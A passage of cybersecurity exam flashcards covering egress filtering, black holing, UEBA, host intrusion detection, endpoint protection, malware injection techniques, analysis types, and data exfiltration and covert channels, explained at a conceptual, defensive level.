Drop vs Reject
* A deny rule can either drop a packet or explicitly reject it by sending a TCP RST or an ICMP port/protocol unreachable to the requester
* Dropping traffic makes it harder for attackers to identify port states accurately

Egress Filtering
Applies ACL rules to outgoing traffic to prevent malware from communicating with C2 servers

Best practices to configure egress filters:
1. Only allow whitelisted application ports and destination addresses
2. Restrict DNS lookups to trusted and authorized DNS services
3. Block access to known bad IP address ranges (block list)
4. Block all internet access from host subnets that don’t use it (ICS, SCADA)

NOTE: These practices can’t eliminate all malware C2 since many operate over social media and cloud-based HTTPS connections (Slack server, FB messenger, etc), but they still help

Black Hole
* Means of mitigating DoS or intrusion attacks by silently dropping (discarding) the traffic
* You black hole it, you throw it away, so it doesn’t get to the intended target
* More effective than using ACL on a firewall
* Can be done at firewall or router level, but at firewall level you use a lot of processing power and router is more efficient—so use it at the router level
* At router, sends traffic to the null interface that drops all traffic coming its way
* EX: Redirect all dark nets to a black hole until they’re needed for business operations

65
Q

UEBA

A

User and Entity Behavior Analytics

A system that can provide automated identification of suspicious activity by user accounts and computer hosts

Less about endpoint data collection and more about the actual process of analyzing the data you’re getting

The idea is to get a baseline of good knowledge, and then compare anything that goes outside of that baseline and start thinking it may be suspicious

UEBA is focused on analytics, and UEBA solutions are heavily reliant on AI and ML to process all of that data
* Microsoft Advanced Threat Analytics
* Splunk User Behavior Analytics

66
Q

HIDS / HIPS

A

Host based IDS / IPS

They monitor a computer system for unexpected behavior or drastic changes to the system’s state on an endpoint

Most use signature-based detection with log or file monitoring systems to see if something bad is happening to your endpoint, and they may use file system integrity monitoring as well to see if your OS files, drivers, or apps have been changed

These are things that NIDS / NIPS can’t see

67
Q

EPP

A

Endpoint Protection Platform

A software agent and monitoring system that performs multiple security tasks like antivirus, HIDS / HIPS, firewall, DLP, and file encryption in one product

The Swiss Army Knife of security tools

68
Q

Malware Exploitation

A

Most modern malware uses fileless techniques to avoid detection by signature-based security software, and here’s how a modern APT would use this to operate:
1. Dropper or downloader
2. Maintain access
3. Strengthen access
4. Actions on objectives
5. Concealment

Let’s look at some key terms associated with these steps:

Dropper
* Malware designed to install or run other types of malware embedded in a payload of an infected host
* Usually this is a stage 1 dropper, the code you first got
* When you get that code and run it, it goes out to get more code through a downloader

Downloader
* A piece of code that connects to the internet to retrieve additional tools after the initial infection by a dropper
* Stage 2 for the downloader

Shell Code
* Any lightweight code designed to run an exploit on the target, which can include any type of code format from scripting languages to binary code
* Once shell code is created as a process, bad stuff happens via code injection

Code Injection
* Exploit technique that runs malicious code with the identification number of a legitimate process
* Attackers can hide malware within processes by injecting code into them

Masquerading
* Dropper replaces a genuine exe with a malicious one

DLL Injection
* Dropper forces a legitimate process to load a malicious DLL
* Once the DLL is loaded, its malicious code executes inside that process

DLL Sideloading
* Dropper exploits a vulnerability in a legitimate program manifest to load a malicious DLL at runtime

Process Hollowing
* Dropper starts a process in a suspended state and then rewrites the process code with the malware code
* Taking over some place in memory to put malicious code in

69
Q

Types of Analysis

A

Conditional Analysis
* A simple form of correlation performed by a machine by using signature detection and rules-based policies
* Very clear cut—rule and signature based
* Conditional requires you to have rules, and if you don’t have rules you’re going to be blind to zero days and new TTPs
* This type of analysis also creates large numbers of false positives because the rules are basic and don’t understand the intricacies of human behavior

Heuristic Analysis
* A method that uses feature comparisons and likenesses rather than specific signature matching to identify whether the target of observation is malicious
* Uses ML to alert on behavior that’s similar to a signature or rule, but not exact
* The benefit is that attackers are smart, and if they realize their patterns are flagging alerts, they’ll modify their patterns—but heuristics will find the new patterns too because of ML and AI
* Over time the machines learn what’s bad and what’s good
* Returns a lot of false positives and negatives, but it gets better over time

Behavioral Analysis
* A network monitoring system that detects changes in normal operating data sequences and identifies abnormal sequences
* Generates an alert whenever anything deviates outside a defined level of tolerance from a given baseline
* Generates a lot of false positives and negatives, until your statistical model is trained and tuned
* Creating our own standard

Anomaly Analysis
* A network monitoring system that uses a baseline of acceptable outcomes or event patterns to identify events that fall outside an acceptable range
* Generates an alert on any event or outcome that doesn’t follow a set pattern
* Uses prescribed patterns like an RFC or industry standard

70
Q

Data Exfiltration

A

HTTP/S Transfers
* An attacker uses commercial file sharing services to upload the exfiltrated data from a victim
* DropBox, GDrive, etc

HTTP request to database services
* An attacker may use SQL injection or similar techniques to copy records from the database to which they should not have access
* IoC: A spike in requests to PHP or other script files, and unusually large HTTP response packets

DNS
* Use of DNS queries to transmit data out of a network enclave
* IOC: If you see an atypical query type being used, like TXT, MX, CNAME, and NULL

Overt Channels
* A channel meant to send data
* Use of FTP, instant messaging, P2P, email, and other obvious file and data sharing tools

Explicit Tunnels
* Use of SSH or VPNs to create a tunnel to transmit the data across a given network
* IOC: Atypical endpoints involved in tunnels due to their geographic locations

NOTE:
* Attackers can use a different channel for exfiltration than for C2

Mitigation
* Use strong encryption of data at rest and data in transit

71
Q

Covert Channels

A

Covert Channels
* Transmitting Data Over Nonstandard Port
* Encoding Data in TCP/IP Packet Headers
* Segmenting Data Into Multiple Packets
* Obfuscating Data Using Hex
* Transmitting Encrypted Data

Mitigation
* Advanced intrusion detection and user behavior analytics tools are best, but won’t detect everything

Covert Storage Channel
* Uses one process to write to a storage location and another process to read from that location

Covert Timing Channel
* Uses one process to alter a system resource so that changes in its response time can signal information to a recipient process